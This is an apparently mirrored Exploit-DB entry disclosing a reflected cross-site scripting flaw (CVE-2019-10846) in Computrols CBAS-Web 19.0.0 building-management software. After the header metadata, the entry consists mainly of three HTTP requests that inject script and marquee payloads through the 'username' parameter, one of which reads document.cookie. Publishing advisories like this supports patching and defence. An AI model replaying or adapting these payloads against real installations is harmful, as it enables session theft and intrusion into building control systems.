Computrols CBAS-Web 19.0.0 – ‘username’ Reflected Cross-Site Scripting

  • 作者: LiquidWorm
    日期: 2019-11-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47614/
  • # Exploit Title: Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
    # Google Dork: NA
    # Date: 2018-09-06
    # Exploit Author: LiquidWorm
    # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
    # Software Link: https://www.computrols.com/building-automation-software/
    # Version: 19.0.0
    # Tested on: NA
    # CVE : CVE-2019-10846
    # Advisory: https://applied-risk.com/resources/ar-2019-009
    # Paper: https://applied-risk.com/resources/i-own-your-building-management-system
    
    POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1
    
    username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email
    
    =======
    
    POST /cbas/index.php?m=auth&a=login HTTP/1.1
    
    username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
    
    =======
    
    GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1